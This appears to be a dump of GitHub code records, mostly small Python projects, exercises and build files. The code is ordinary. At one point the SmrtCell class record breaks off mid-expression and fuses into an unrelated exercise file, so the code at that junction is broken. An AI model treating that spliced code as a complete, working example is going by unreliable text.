pd.pivot_table(banks,index=['Gender','Married','Self_Employed'],values='LoanAmount',aggfunc='mean').reset_index()\r\n\r\nloan_stauts_se = banks[(banks['Self_Employed']== 'Yes' ) & (banks['Loan_Status']=='Y')]\r\n\r\nloan_stauts_nse = banks[(banks['Self_Employed']== 'No' ) & (banks['Loan_Status']=='Y')]\r\n\r\npercentage_se = round((len(loan_stauts_se)/614)*100,2)\r\npercentage_nse = round((len(loan_stauts_nse)/614)*100,2)\r\nprint(percentage_nse,percentage_se)\r\n\r\nloan_term = banks['Loan_Amount_Term'].apply(lambda x : x /12 )\r\nbig_loan_term = []\r\nfor i in loan_term:\r\n if i >= 25 :\r\n big_loan_term.append(i)\r\nprint(len(big_loan_term))\r\n\r\n\r\nmean_values = banks.groupby(['Loan_Status'])['ApplicantIncome','Credit_History'].mean()\r\n\r\nprint(mean_values)\r\n#Code starts here\r\n\r\n\n\n\n","repo_name":"umeshtik3/Greyatoms-Projects","sub_path":"loan_approval_analysis/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19490230511","text":"import logging\nimport sys\n\nimport pygame\n\nfrom ozobotmapf.graphics.ozomap_drawable import OzomapDrawableParser\nfrom ozobotmapf.simulator.timer import Timer\nfrom ozobotmapf.utils.constants import Colors, Values\n\n\nclass Simulator:\n def __init__(self, ozomap, plans, config):\n self.ozomap = ozomap\n self.plans = plans\n self.config = config\n\n self.timer = Timer()\n # self.timer = Timer(True) # Debug mode timer\n\n self.map_objects = OzomapDrawableParser(ozomap, config).parse()\n self.agents = self.__init_agents()\n\n self.__pygame_init()\n\n def __init_agents(self):\n agents = []\n for agent_id in self.plans:\n agents.append(self.config.agent_class(agent_id, self.plans[agent_id], self.ozomap, self.config))\n\n return agents\n\n def __pygame_init(self):\n logging.info(\"Initializing pygame.\")\n pygame.init()\n pygame.display.set_caption(Values.APP_NAME)\n self.__screen = None\n self.__width, self.__height = self.config.window_width, self.config.window_height\n\n def __init_screen(self):\n logging.info(\"Initializing screen.\")\n if self.config.fullscreen:\n self.__screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n else:\n self.__screen = pygame.display.set_mode([self.config.window_width, self.config.window_height])\n self.__screen.fill(Colors.WHITE)\n self.__width, self.__height = pygame.display.get_surface().get_size()\n logging.debug(\"Application window resolution: {} x {} (px)\".format(self.__width, self.__height))\n\n def run(self):\n logging.info(\"Starting the Simulator process.\")\n self.__init_screen()\n\n self.__preview_map()\n self.__wait_for_user()\n\n self.timer.start(self.__get_longest_path_time())\n\n while not self.timer.is_finished():\n self.__handle_events()\n time = self.timer.get_time()\n self.__update_agents(time)\n self.__draw_map().__draw_active_paths()\n self.__update()\n\n self.__wait_for_user()\n\n pygame.quit()\n logging.info(\"Successfully finished the Simulator process.\")\n\n @staticmethod\n def __wait_for_user():\n while True:\n for event in pygame.event.get():\n if (event.type == pygame.QUIT) or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n logging.info(\"Quitting application.\")\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n return\n\n @staticmethod\n def __handle_events():\n for event in pygame.event.get():\n if (event.type == pygame.QUIT) or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n logging.info(\"Quitting application.\")\n pygame.quit()\n sys.exit()\n\n def __draw_map(self):\n self.__screen.fill(Colors.WHITE)\n\n self.map_objects[0].draw(self.__screen) # Agent Starts/Ends\n\n if self.config.display_grid:\n self.map_objects[1].draw(self.__screen) # Grid border lines\n\n if self.config.display_walls:\n self.map_objects[2].draw(self.__screen) # Walls\n\n return self\n\n def __draw_all_paths(self):\n for agent in self.agents:\n self.__draw_agent_path(agent)\n\n def __draw_agent_path(self, agent):\n for drawable in agent.get_active_path():\n drawable.draw(self.__screen)\n\n def __update(self):\n pygame.display.update()\n return self\n\n def __preview_map(self):\n self.__draw_map()\n\n if self.config.direction_preview:\n for agent in self.agents:\n if agent.direction_arrow is not None:\n agent.direction_arrow.draw(self.__screen)\n\n self.__update()\n\n def __update_agents(self, time):\n for agent in self.agents:\n agent.update_path(time)\n return self\n\n def __draw_active_paths(self):\n for agent in self.agents:\n agent.get_active_path().draw(self.__screen)\n return self\n\n def __get_longest_path_time(self):\n max_len = 0\n for agent in self.agents:\n p_len = agent.plan_length\n if p_len > max_len:\n max_len = p_len\n return (max_len * self.config.step_time) + self.config.tail_lag\n","repo_name":"EnviloN/ozobot-mapf-simulator","sub_path":"ozobotmapf/simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"3451046245","text":"import logging\n\nfrom datetime import datetime\n\nfrom unicodedata import normalize\n\nfrom helper.io_module import check_file\nfrom helper.io_module import get_absolute_path\n\nfrom pbcore.io import SubreadSet\n\n'''\nRepresents a PacBio SMRT cell. Provides easy methods for accessing sequencing and metadata.\n'''\nclass SmrtCell(object):\n \n '''\n Initializes a new SmrtCell object from a smrtcell xml file\n @param xml_file: the path to a subreadset.xml file of a smrtcell\n '''\n def __init__(self,xml_file):\n self.__logger = logging.getLogger('support.smrtcell')\n self.__is_valid = False\n \n self.__xml_file = check_file(xml_file)\n if not self.__xml_file:\n self.show_log('error', 'XML file '+self.__xml_file+' does not exist or is not a file!')\n return\n \n#TODO: read xml content from encrypted file \n self.__subreadset = None\n try:\n self.__subreadset = SubreadSet(self.__xml_file)\n except IOError as err:\n self.show_log('error', 'Parsing of XML file '+self.__xml_file+' was not successful: '+err+'!')\n return\n \n self.__is_valid = True\n \n\n '''\n Tests if the SmrtCell object is valid.\n @return: return true if the SmrtCell object is valid otherwise false\n @rtype: bool\n ''' \n def is_valid(self):\n return self.__is_valid\n\n '''\n Returns the name of the SmrtCell object.\n @return: the name\n @rtype: str\n ''' \n def get_name(self):\n return self.__subreadset.name if self.__is_valid else None\n\n '''\n Returns the total number of reads in the SmrtCell object.\n @return: the number of reads\n @rtype: integer\n ''' \n def get_total_number_of_reads(self):\n return int(self.__subreadset.metadata.numRecords) if self.__is_valid else None\n\n '''\n Returns the total number of bp in the SmrtCell object.\n @return: the number of bp\n @rtype: integer\n ''' \n def get_total_sum_of_bp(self):\n return int(self.__subreadset.metadata.totalLength) if self.__is_valid else None\n\n '''\n Returns the number of collections ('sequencing runs') in the SmrtCell object.\n Should be 1 in almost all cases. If not, all other functions have an optional argument \n to specify the collection.\n @return: the number of sequencing runs\n @rtype: integer\n ''' \n def get_number_of_collections(self):\n return len(self.__subreadset.metadata.collections) if self.__is_valid else None\n \n '''\n Checks if a provided collection index is valid, i.e. can access a collection.\n Do not confuse with collection index.\n @param collection_index: the index of the collection\n @return: true if collection index is valid otherwise false\n @rtype: bool\n ''' \n def check_collection_index(self,collection_index):\n return self.__is_valid and collection_index >= 0 and collection_index \") #set new variable defined by user input\r\n\r\ntxt_again = open(file_again) #same as txt (Line 5)\r\n\r\nprint(txt_again.read()) #prints the text from a user inputted filename\r\n\r\ntxt_again.close() #same as Line 10\r\n","repo_name":"ppapuli/Portfolio","sub_path":"LearnPythonTheHardWay/ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2958445374","text":"import folium\nimport altair as alt\nimport datetime\nimport pandas as pd\nimport numpy as np\n\ndef line_vega(UID, panel):\n # create vega object for attaching plot on marker\n data = panel[panel[\"UID\"] == UID].iloc[0, -7:]\n\n x = [datetime.datetime.strptime(i, '%m/%d/%y') for i in list(data.index)[-7:]]\n x = pd.to_datetime(x).astype(int).astype(int) / 10 ** 6\n y = list(data)\n data2 = pd.DataFrame([x,y],index=[\"Date\", \"Confirmed\"]).transpose()\n\n\n line = alt.Chart(data2).mark_line().encode(\n alt.X('Date:T' , timeUnit='monthdate',axis = alt.Axis(title = 'DATE', format = (\"%b %d\"))), \n alt.Y('Confirmed:Q',axis = alt.Axis(title = 'Number of Cases'))\n ).properties(\n title=f'{panel[panel[\"UID\"] == UID].iloc[0, 5]} county has {int(y[-1])} case.',\n # , {int(y[-1]/ panel[panel[\"UID\"] == UID].iloc[0, -8] * 100 - 100)}% increase in 7 days\n width=300,\n height=200\n )\n\n vega = folium.features.VegaLite(line, width=360, height=250)\n \n return vega\n\n\ndef color_on_quantity(n):\n # color from sharp to pale indicates the sericity\n if n > 10000:\n color=\"red\" \n elif n > 1000:\n color=\"#8B0000\" # pale red\n elif n > 100:\n color=\"#FA8072\"# salmon \n elif n > 10:\n color=\"#FFCE00\"# tangerine \n else:\n color=\"#0A8A9F\" # teal\n return color\n\ndef plot_confirm_counts(data, df_panel):\n\n ## Create map\n\n folium_map = folium.Map(location=[37, -105],\n zoom_start=5,\n tiles=\"CartoDB dark_matter\", # alternative \"OpenStreetMap\"\n width=960, \n height=540)\n \n for index in range(data.shape[0]): # data.shape[0]\n case_info = data.iloc[index, 5:]\n if case_info[2] > 0:\n\n county_name = data.iloc[index, 1]\n \n # radius of circles\n radius = np.log10(case_info[2]*10) * 5\n\n # choose the color of the marker\n color = color_on_quantity(case_info[2])\n\n marker = folium.CircleMarker(location=(case_info[0],case_info[1]),\n radius=radius,\n color=color,\n fill=True)\n \n vega = line_vega(case_info[-1], df_panel)\n\n popup = folium.Popup()\n vega.add_to(popup)\n popup.add_to(marker)\n marker.add_to(folium_map)\n\n \n return folium_map\n","repo_name":"constiny/COVID19","sub_path":"src/mapping_helper.py","file_name":"mapping_helper.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7162885786","text":"\"\"\"\n2805번 - https://www.acmicpc.net/problem/2805\n\n나무 자르기\n\"\"\"\n\nimport sys \ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ntrees = list(map(int, input().split()))\nlowest, highest = 0, max(trees)\n\nwhile lowest <= highest:\n median, cut_tree = (lowest+highest)//2, 0\n\n for tree in trees:\n if tree > median:\n cut_tree += tree - median\n\n if cut_tree >= M: lowest = median + 1\n else: highest = median - 1\nprint(highest)\n\n\"\"\"\nwhile answer != median:\n median, cut_tree = (lowest+highest)//2, 0\n\n for i in range(N):\n if trees[i] > median:\n cut_tree += trees[i] - median\n\n if cut_tree == M: answer = median\n elif cut_tree > M: lowest = median - 1\n else: highest = median +1\nprint(answer)\n\"\"\"","repo_name":"yehyunsuh/Paper_Review_Algorithm_Study","sub_path":"Baekjoon/Binary Search/2805번 나무 자르기_정답.py","file_name":"2805번 나무 자르기_정답.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"32840224382","text":"import numpy as np\nfrom Perceptron import Perceptron\nfrom NeuralNet import NeuralNet\nimport random\nimport matplotlib.pyplot as plt\n\ntraining_inputs = []\nout_x_c = []\nout_y_c = []\nout_x_f = []\nout_y_f = []\nin_x = []\nin_y = []\n\n\ndef awgn(inp):\n noise = False\n noise_x = 0\n noise_y = 0\n \n if noise:\n noise_x = random.random() - 0.48\n noise_y = random.random() - 0.48\n \n inp[0] += noise_x\n inp[1] += noise_y\n inp.append(abs(inp[0]))\n inp.append(abs(inp[1]))\n return inp\n\n\ndef predict(n, inp, r_w):\n global in_x, in_y, out_x_c, out_y_c, out_x_f, out_y_f\n result = n.predict(inp)\n print(\"Result\", result)\n in_x.append(inp[0])\n in_y.append(inp[1])\n result_coord = convert_to_coordinate(result)\n if result == r_w:\n out_x_c.append(result_coord[0])\n out_y_c.append(result_coord[1])\n else:\n out_x_f.append(result_coord[0])\n out_y_f.append(result_coord[1])\n return\n\n\ndef convert_to_coordinate(inp):\n coord = []\n if inp[0] == 0:\n signx = -1\n else:\n signx = 1\n if inp[1] == 0:\n signy = -1\n else:\n signy = 1\n if inp[2] == 0:\n signx2 = -1\n else:\n signx2 = 1\n if inp[3] == 0:\n signy2 = -1\n else:\n signy2 = 1\n\n coord.append(signx*(1.5+2*inp[2]))\n coord.append(signy*(1.5+2*inp[3]))\n #coord.append(signx*(1.5+2*inp[2]+signx2*(-0.5+inp[4])))\n #coord.append(signy*(1.5+2*inp[3]+signy2*(-0.5+inp[5])))\n return coord\n\n\ntraining_inputs.append(np.array([1, 1, 1, 1]))\ntraining_inputs.append(np.array([2, 2, 2, 2]))\ntraining_inputs.append(np.array([3, 3, 3, 3]))\ntraining_inputs.append(np.array([4, 4, 4, 4]))\n\ntraining_inputs.append(np.array([-1, -1, 1, 1]))\ntraining_inputs.append(np.array([-2, -2, 2, 2]))\ntraining_inputs.append(np.array([-3, -3, 3, 3]))\ntraining_inputs.append(np.array([-4, -4, 4, 4]))\n\ntraining_inputs.append(np.array([1, -1, 1, 1]))\ntraining_inputs.append(np.array([2, -2, 2, 2]))\ntraining_inputs.append(np.array([3, -3, 3, 3]))\ntraining_inputs.append(np.array([4, -4, 4, 4]))\n\ntraining_inputs.append(np.array([-1, 1, 1, 1]))\ntraining_inputs.append(np.array([-2, 2, 2, 2]))\ntraining_inputs.append(np.array([-3, 3, 3, 3]))\ntraining_inputs.append(np.array([-4, 4, 4, 4]))\n\n\nlabels = [[1, 1, 0, 0, 1, 1], [1, 1, 0, 0, 0, 0], [1, 1, 1, 1, 0, 0], [1, 1, 1, 1, 1, 1],\n [0, 0, 0, 0, 1, 1], [0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 1, 1],\n [1, 0, 0, 0, 1, 1], [1, 0, 0, 0, 0, 0], [1, 0, 1, 1, 0, 0], [1, 0, 1, 1, 1, 1],\n [0, 1, 0, 0, 1, 1], [0, 1, 1, 0, 0, 0], [0, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1],\n ]\n\nperceptron1 = Perceptron(4, 1)\nperceptron2 = Perceptron(4, 2)\nperceptron3 = Perceptron(4, 3)\nperceptron4 = Perceptron(4, 4)\nperceptron5 = Perceptron(4, 5)\nperceptron6 = Perceptron(4, 6)\n\nnn = NeuralNet()\n\nnn.add_perceptron(perceptron1)\nnn.add_perceptron(perceptron2)\nnn.add_perceptron(perceptron3)\nnn.add_perceptron(perceptron4)\nnn.add_perceptron(perceptron5)\nnn.add_perceptron(perceptron6)\n\nnn.train(training_inputs, labels)\n\ninputs = np.array(awgn([1, 1]))\nprint(nn.predict(inputs))\n#=> 1\n\ninputs = np.array(awgn([-2, 2]))\nprint(nn.predict(inputs))\n#=> 0\nx = np.linspace(-4, 4, 100)\n\n#Perceptron 1\nb = perceptron1.weights[0]+0.00000000000000000000000000000001\nw1 = perceptron1.weights[1]+0.00000000000000000000000000000001\nw2 = perceptron1.weights[2]+0.000000000000000000000000000001\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / ( b / w1))*x + (-b / w2), label='Perceptron 1')\n\n#Perceptron 2\nb = perceptron2.weights[0]+0.000000000000000000000000000001\nw1 = perceptron2.weights[1]+0.000000000000000000000000000001\nw2 = perceptron2.weights[2]+0.000000000000000000000000000001\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 2')\n\nplt.ylim(-4, 4)\nplt.legend()\nplt.show()\n\n#Perceptron 3\nb = perceptron3.weights[0]\nw1 = perceptron3.weights[3]\nw2 = perceptron3.weights[4]\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 3')\n\n#Perceptron 4\nb = perceptron4.weights[0]\nw1 = perceptron4.weights[3]\nw2 = perceptron4.weights[4]\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 4')\n\n#Perceptron 5\nb = perceptron5.weights[0]\nw1 = perceptron5.weights[1]\nw2 = perceptron5.weights[2]\n\n# print(b, w1, w2)\n\n# plt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 5')\n\n#Perceptron 6\nb = perceptron6.weights[0]\nw1 = perceptron6.weights[1]\nw2 = perceptron6.weights[2]\n\n# print(b, w1, w2)\n\n# plt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 6')\n\nplt.legend()\nplt.show()\n\npredict(nn, awgn([2, 2]), [1, 1, 0, 0, 0, 0])\n\nplt.plot(out_x_c, out_y_c, 'gx', label='Correct Predictions')\nplt.plot(out_x_f, out_y_f, 'r+', label='Incorrect Predictions')\nplt.plot(in_x, in_y, 'b.', label='Inputs')\n\n\nplt.title(\"Results\")\nplt.xlim(-5, 5)\nplt.ylim(-5, 5)\nplt.grid()\nplt.show()\n","repo_name":"RobertWalstab/Perceptron","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"15337930212","text":"from flask_script import Manager, Server, Shell\n\nfrom blog.main import bootstrap_app\nfrom blog.model import BaseModel\n\napp = bootstrap_app()\nmanager = Manager(app)\n\n\nmanager.add_command(\"runserver\", Server())\nmanager.add_command(\"shell\", Shell())\n\n\n@manager.command\ndef init_db():\n engine = manager.app.engine\n print('*************************************')\n print('*** Initialized Data Model schema ***')\n print('### *** ###')\n BaseModel.metadata.drop_all(engine)\n BaseModel.metadata.create_all(engine)\n print('*** Data Model schema is initialized successfully ***')\n print('*****************************************************')\n\n\nif __name__ == \"__main__\":\n manager.run()\n","repo_name":"lemzoo/rest_api_demo","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7144822357","text":"import requests\n\nrequest_url = \"https://petstore.swagger.io/v2/pet/findByStatus\"\nparams = {\"status\": \"available\"}\n\nfind_pets_by_status = requests.get(request_url, params=params)\n\npets_array = find_pets_by_status.json()\npets_array = pets_array[:9]\n\npets_names_ids = ''\n\nfor item in pets_array:\n pets_names_ids += (str(item.get('id')) + ' ' + item.get('name') + '\\n')\n\nprint(pets_names_ids)","repo_name":"lo10-2-1/petstore-api-doc","sub_path":"integration_example.py","file_name":"integration_example.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"7026828364","text":"\nimport pandas as pd\n\ndata = []\n\nwhile True:\n name = input(\"Write your name please:\")\n salary = input(\"Write your salary please:\")\n age = input(\"Write your age please:\")\n choice = input(\"Do you want to continue add data to your excel file? Y/N\")\n data.append([name, salary, age])\n if choice == \"Y\" or choice == 'y':\n continue\n else:\n break\n\n\n#Kolumna z danymi w excelu\n\nzapis = pd.DataFrame(data, columns=['Imię', 'Pensja', 'Wiek'])\n\n#Zapisanie do excela\n\nzapis.to_excel('zapisywanie_danych_w_excelu.xlsx', index=False)\n","repo_name":"Moqosa/zapisywanie_danych_w_excelu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"42452863901","text":"# 2561. Rearranging Fruits\nclass Solution:\n def minCost(self, basket1: List[int], basket2: List[int]) -> int:\n # if any count of numbers is odd, we cannot pair them up\n c = Counter(basket1 + basket2)\n for v in c.values():\n if v % 2 == 1:\n return -1\n\n # compute l1 and l2, the list of numbers that aren't in the other baskets\n # values in l1 and l2 represent number pairs in surplus for that respective list\n for v in basket2:\n # subtract 2 since values in basket2 were already counted once above\n c[v] -= 2\n surplus1, surplus2 = [], []\n for k, v in c.items():\n if v == 0:\n continue\n if v > 0:\n surplus1.extend([k for _ in range(v // 2)])\n else:\n surplus2.extend([k for _ in range(abs(v // 2))])\n l1, l2 = deque(sorted(surplus1)), deque(sorted(surplus2))\n\n cost = 0\n \"\"\"\n for the min number pair in one list with value A and the max number pair in the other list with value B\n we can swap one A value with one B value for cost A\n we can also do an indirect swap by swapping twice with the smallest value for a potential lower cost\n smallest in same list as A => swap one B value with smallest, then swap A with that smallest value\n smallest in other list => swap one A value with smallest, then swap B value with that smallest value\n swapping this way will always keep smallest in its original list, not that it matters\n \"\"\"\n indirect_swap_cost = 2 * min(min(basket1), min(basket2))\n while l1 and l2:\n # look at the front of l1 and l2 to determine which opposite number pairs to process, smaller will always be better\n # the pop statements only represent the number pairs with values A and B being processed, not what swaps happened\n if l1[0] < l2[0]:\n cost += min(l1[0], indirect_swap_cost)\n l1.popleft()\n l2.pop()\n else:\n cost += min(l2[0], indirect_swap_cost)\n l2.popleft()\n l1.pop()\n\n return cost\n","repo_name":"feefs/ps","sub_path":"leetcode-contests/weekly-331/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"11800028834","text":"\"\"\"add column to store public-id image when upload to cloudinary\n\nRevision ID: dab014f6ee4e\nRevises: 6e93b8f8c282\nCreate Date: 2021-11-27 19:02:56.377197\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'dab014f6ee4e'\ndown_revision = '6e93b8f8c282'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user',\n sa.Column('image_id', sa.String(length=200), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'image_id')\n # ### end Alembic commands ###\n","repo_name":"truongnguyenvan8801/ManagementStudent_Flask","sub_path":"migrations/versions/dab014f6ee4e_add_column_to_store_public_id_image_.py","file_name":"dab014f6ee4e_add_column_to_store_public_id_image_.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"22704360870","text":"file1 = open('puzzle_input.csv', 'r')\n\ndef fullyContains(first, second):\n startBeforeOtherStart = int(first[0].strip()) <= int(second[0].strip())\n endAfterOtherEnd = int(first[1].strip()) >= int(second[1].strip())\n startWithinOtherRange = int(first[0].strip()) >= int(second[0].strip()) and int(first[0].strip()) <= int(second[1].strip())\n endWithinOtherRange = int(first[1].strip()) >= int(second[0].strip()) and int(first[1].strip()) <= int(second[1].strip())\n return startBeforeOtherStart or endAfterOtherEnd or startWithinOtherRange or endWithinOtherRange\n\nLines = file1.readlines()\nfullycontainedElements = 0\nfor line in Lines:\n # print(line)\n parts = line.split(',')\n # print(parts)\n limits1 = parts[0].split('-')\n # print(limits1)\n limits2 = parts[1].split('-')\n # print(limits2)\n if fullyContains(limits1, limits2) or fullyContains(limits2, limits1):\n fullycontainedElements = fullycontainedElements+1\n\nprint(fullycontainedElements)","repo_name":"Rasmus256/advent_of_code_2022","sub_path":"day4/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"634333721","text":"import en_core_web_sm\nimport glob\nimport csv\nimport logging\nfrom extraction_rules import InformationExtractor\nimport json\nimport urllib.request\nimport zipfile\nfrom tqdm import tqdm\n\nlogging.basicConfig(format='%(process)d-%(levelname)s-%(message)s', \n level=logging.INFO)\n\nnlp = en_core_web_sm.load()\ntsv_files = glob.glob(\"gitter-history-dfa9f2287cf20e04640646edab14e5a83a5fb0f1/archives/*.tsv\")\ndata = []\n\nif len(tsv_files) == 0:\n print('Beginning file download with urllib2...')\n url = 'https://github.com/freeCodeCamp/gitter-history/archive/dfa9f2287cf20e04640646edab14e5a83a5fb0f1.zip' \n urllib.request.urlretrieve(url, 'data.zip')\n print('Unziping data...')\n zip_ref = zipfile.ZipFile('data.zip', 'r')\n zip_ref.extractall('./')\n zip_ref.close()\n tsv_files = glob.glob(\"gitter-history-dfa9f2287cf20e04640646edab14e5a83a5fb0f1/archives/*.tsv\")\n\nextractor = InformationExtractor(nlp)\n\nfor tsv in tqdm(tsv_files):\n with open(tsv, \"r\") as f:\n reader = csv.reader(f, delimiter='\\t')\n #logging.info(\"Reading: %s\", tsv)\n for row in tqdm(reader):\n city = tsv.split(\"/\")[-1]\n text_raw = row[6]\n text = nlp(text_raw)\n\n mentions = extractor.extract_mention(text, city)\n if len(mentions) == 0:\n mentions = [{\"city\":city, \"rule\":\"MENTION\",\"text\":\"Not found\",\n \"message\":text_raw, \"sent_at\": row[2]}]\n else:\n for item in mentions:\n item.update({\"message\":text_raw})\n item.update({\"sent_at\": row[2]})\n\n data.append(mentions)\n\nwith open('raw_data.json', 'w') as f:\n flat_list = [item for sublist in data for item in sublist]\n json.dump(flat_list, f)\n","repo_name":"dmesquita/chi-square-test-for-homogeneity","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7145005353","text":"import fnmatch\nimport os\nimport time\nimport atexit\nfrom SCons.Defaults import *\n\nrelease = True\n\nif(release):\n\toptimization = ['-O3', '-DNDEBUG', '-fno-rtti', '-fno-exceptions', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']\n\tdebug = '-g0'\n\tlto = \"1\"\n\tclosure = \"0\"\n\tassertions = \"0\"\n\tdemangle = \"0\"\nelse:\n\toptimization = ['-O0']\n\tdebug = '-g3'\n\tlto = \"0\"\n\tclosure = \"0\"\n\tassertions = \"2\"\n\tdemangle = \"1\"\n\n\ndef main():\n\tenv = Environment(ENV = os.environ, tools = ['gcc', 'g++', 'gnulink', 'ar', 'gas'])\n\t\t\n\tenv.Replace(CC = \"emcc\" )\n\tenv.Replace(CXX = \"em++\" )\n\tenv.Replace(LINK = \"emcc\" )\n\t\n\tenv.Replace(AR = \"emar\" )\n\tenv.Replace(RANLIB = \"emranlib\")\n\t\n\tenv.Replace(LIBLINKPREFIX = \"\")\n\tenv.Replace(LIBPREFIX = \"\")\n\tenv.Replace(LIBLINKSUFFIX = \".bc\")\n\tenv.Replace(LIBSUFFIX = \".bc\")\n\tenv.Replace(OBJSUFFIX = \".o\")\n\tenv.Replace(PROGSUFFIX = \".html\")\n\t\n\tenv.Append( CPPFLAGS=optimization)\n\tenv.Append( LINKFLAGS=[\n\t\toptimization,\n\t\tdebug,\n\t\t\"-lGL\",\n\t\t\"-s\", \"ASSERTIONS=\" + assertions,\n\t\t\"-s\", \"DEMANGLE_SUPPORT=\" + demangle,\n \"-s\", \"ALLOW_MEMORY_GROWTH=0\",\n\t\t\"-s\", \"TOTAL_MEMORY=1023MB\",\n \"-s\", \"EXTRA_EXPORTED_RUNTIME_METHODS=[\\\"ccall\\\", \\\"cwrap\\\"]\",\n\t\t\"--llvm-lto\", lto,\n\t\t\"--closure\", closure,\n\t\t\"-s\", \"NO_EXIT_RUNTIME=1\",\n\t\t\"-s\", \"DISABLE_EXCEPTION_CATCHING=1\",\n\t\t\"--bind\",\n\t\t\"--preload-file\", \"StyleGAN.ct4\"]\n\t)\n\n\ttimeStart = time.time()\n\tatexit.register(PrintInformationOnBuildIsFinished, timeStart)\n\t\n\tIncludes = [\n\t\t\"tensor4/examples/common\",\n\t\t\"tensor4/include\",\n\t\t\"zfp/include\",\n\t]\n\n\tfiles = [\"main.cpp\", \"StyleGAN.cpp\"]\n\tzfp = Glob(\"zfp/src\", \"*.c\")\n\n\tzfpl = env.Library('zfplib', zfp, LIBS=[], CPPFLAGS=optimization + [debug], LIBPATH='.', CPPPATH = Includes)\n\tprogram = env.Program('stylegan', files, LIBS=[zfpl], CPPFLAGS=optimization + ['-std=c++14', debug], LIBPATH='.', CPPPATH = Includes)\n\t\n\t\ndef PrintInformationOnBuildIsFinished(startTimeInSeconds):\n\t\"\"\" Launched when scons is finished \"\"\"\n\tfailures = GetBuildFailures()\n\tfor failure in failures:\n\t\tprint(\"Target [%s] failed: %s\" % (failure.node, failure.errstr))\n\ttimeDelta = time.gmtime(time.time() - startTimeInSeconds)\n\tprint(time.strftime(\"Build time: %M minutes %S seconds\", timeDelta))\n\t\ndef GlobR(path, filter) : \n\tmatches = []\n\tfor root, dirnames, filenames in os.walk(path):\n \t\tfor filename in fnmatch.filter(filenames, filter):\n \t\t\tmatches.append(os.path.join(root, filename)) \n\treturn matches\n\ndef Glob(path, filter) :\n\tmatches = []\n\tonlyfiles = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\tfor filename in fnmatch.filter(onlyfiles, filter):\n\t\tmatches.append(os.path.join(path, filename))\n\treturn matches\n\nif __name__ == \"SCons.Script\":\n\tmain()\n","repo_name":"podgorskiy/StyleGANCpp","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"84"} +{"seq_id":"4083666996","text":"from django.contrib import admin\nfrom .models import Humans,SubmitedUrls\n\n# Register your models here.\nclass URLAdmin(admin.ModelAdmin):\n\t\tmodel=SubmitedUrls\n\nclass HumansAdmin(admin.ModelAdmin):\n\tlist_display=['__unicode__','twitter','role']\n\t#inlines=[URLAdmin,]\n\t\t\nadmin.site.register(Humans,HumansAdmin)\nadmin.site.register(SubmitedUrls,URLAdmin)\n","repo_name":"forfuturellc/humans-not-robots","sub_path":"hnr/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} 